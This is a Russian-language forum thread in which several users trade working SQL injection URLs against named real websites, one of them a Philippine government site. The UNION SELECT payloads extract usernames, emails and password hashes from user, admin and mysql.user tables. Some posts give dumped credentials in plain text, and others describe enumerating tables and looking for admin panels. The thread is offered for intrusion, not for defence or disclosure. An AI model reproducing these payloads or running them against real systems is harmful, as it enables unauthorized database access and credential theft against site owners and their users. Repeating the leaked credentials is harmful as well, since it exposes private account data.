SQL Инъекции

+1 - 5 версия.
Вывод данных:

Code:

http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(nickname,char(58),email,char(58),passwd),3%20from%20forum_users/*

Code:

http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user_login,char(58),user_email,char(58),user_pass),3%20from%20users_ru/*

Code:

http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat_ws(char(58),absnum,level,position,name,alias,approved,description),3%20from%20admins/*

 

Сорри, затупил. С кем не бывает?

 

Code:

http://mp3-portal.p8.ru/showlyric.php?id=-1'+union+select+1,2,convert(concat(user,0x3a,password)+using+cp1251),4,5,6,7+from+mysql.user/*&char=193

хеши mysql-5, версия 4.1* =)

 

Вот

Code:

http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4/*

Вроде 4, а че дальше так и невкурил (я новичек)! Мож кто продолжит)!

 

USER() : rossorig_superus@localhost
VERSION() : 4.0.27-log
DATABASE() : rossorig_agbook1

 

Вот, погуглил немного:

Code:

http://www.tectonic.co.za/view.php?id=99999999+union+select+1,concat(char(39,60,104,51,62,39),username,0x3a,password,0x3a,email),3,4+from+users
http://intercar.com.ua/index.php?id=-1+union+select+1,2,3,4,5,6+from+users
http://pressa.univ.kiev.ua/news.php?id=-1+union+select+1,2,3,4
http://www.climb.com.ua/aboutbook.php?id=-1+union+select+1,2,3,4,5,6

Здесь админку не могу найти. Есть cpanel, тока к нему не подходит =\

Code:

http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,concat(user,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users&lng=ua
user: admin
pass: repz

Если что-то уже было - ссори за боян

 

http://www.dancenter.ru/articals.php?id=30'

 

sql-inj

www.razvod.ru (4)
phpbb_users (username, user_password, etc.)

ps sob@ke

уже было

 

Code:

http://www.minton.com.tr/html/urun.asp?urun=456465+union+select

есть такая фирма у турок: Minton называется гы. Не смог тейбл подобрать

 

Code:

http://www.bonus.ru/video/index.phtml?film_id=999999999+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11/*

-------------

Code:

http://film.topd.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(database(),char(58),user(),char(58),version()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

-------------

Code:

http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11,12/*
http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(user,char(58),password),char),4,5,6,7,8,9,10,11,12+from+mysql.user/*

-------------

Code:

http://www.natc.ru/clubs/forsazh/paper/?view=true&id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version()),10,11,12,13,14/*

-------------

Code:

http://teo.poliglos.info/main.php?id='+union+select+concat(database(),char(58),user(),char(58),version())/*

Интересных таблиц не нашел:

Code:

http://teo.poliglos.info/main.php?id='+union+select+table_name+from+information_schema.tables+limit+45,1/*

 

Code:

http://www.apahelpcenter.org/articles/article.php?id=-123+union+select+1,version(),user(),4,5/*

P.S. заюзал антибоян только щас... скуля-боян.

 

Department of Social Welfare and Development
DSWD Bldg., Constitution Hills, Batasan Complex, Q.C., Philippines

Code:

http://www.dswd.gov.ph/faqdetails.php?id=-1 union select 1,concat(user,CHAR(64),host,CHAR(58), password),3,4,5,6 from mysql.user/*

 

antigreen.ru

 

ХЭttp://tik.ru/pages/search.php?search=%27

Code:

TABLE_NAME:
tik_pages
tik_users

Code:

TABLE_STRUCT (tik_users):
1, 2, 3, pass, login, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18

Интересная игрушка
Дыры множественные в разных скриптах, в том числе межсайтовый скриптинг, инъекции.

 

sql-inj

Коррозия Металла

http://www.korroziametalla.com/
уязвимость: http://www.korroziametalla.com/news_arh.php?year=2007&id=49'
-> mysql 5
смотрим таблицы стандартными средствами пятой версии:

находим обращаем внимание на kor_forum и kor_admin. смотрим колонки аналогичным образом, потом смотрим в них и видим логин/пароль, пароль в незашифрованном виде

админка

 

root@localhost:299ce3c1618fe6e4

pass:zaq12345

 

Code:

http://www.dubovoe.ru/print.php?news_id=-1+union+select+1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11,12,13,14,15/*

Code:

http://campus4.best-host.ru/index.php?news=-1+union+select+1,2,3,4,5/*

 

Админку найти несмог(, хеши это md5 урезаные до 30 символов, у первых 6 человек один и тот же пароль 123(ещё бы знать его куда воткнуть ), дальше несмотрел

 

*BRAVO*

красиво

p.s. дальше не копал. пользователей там много mysql.user закрыт.

 

http://doska.911.by

Code:

http://doska.911.by/full_info.php?sid=-1+union+select+1/*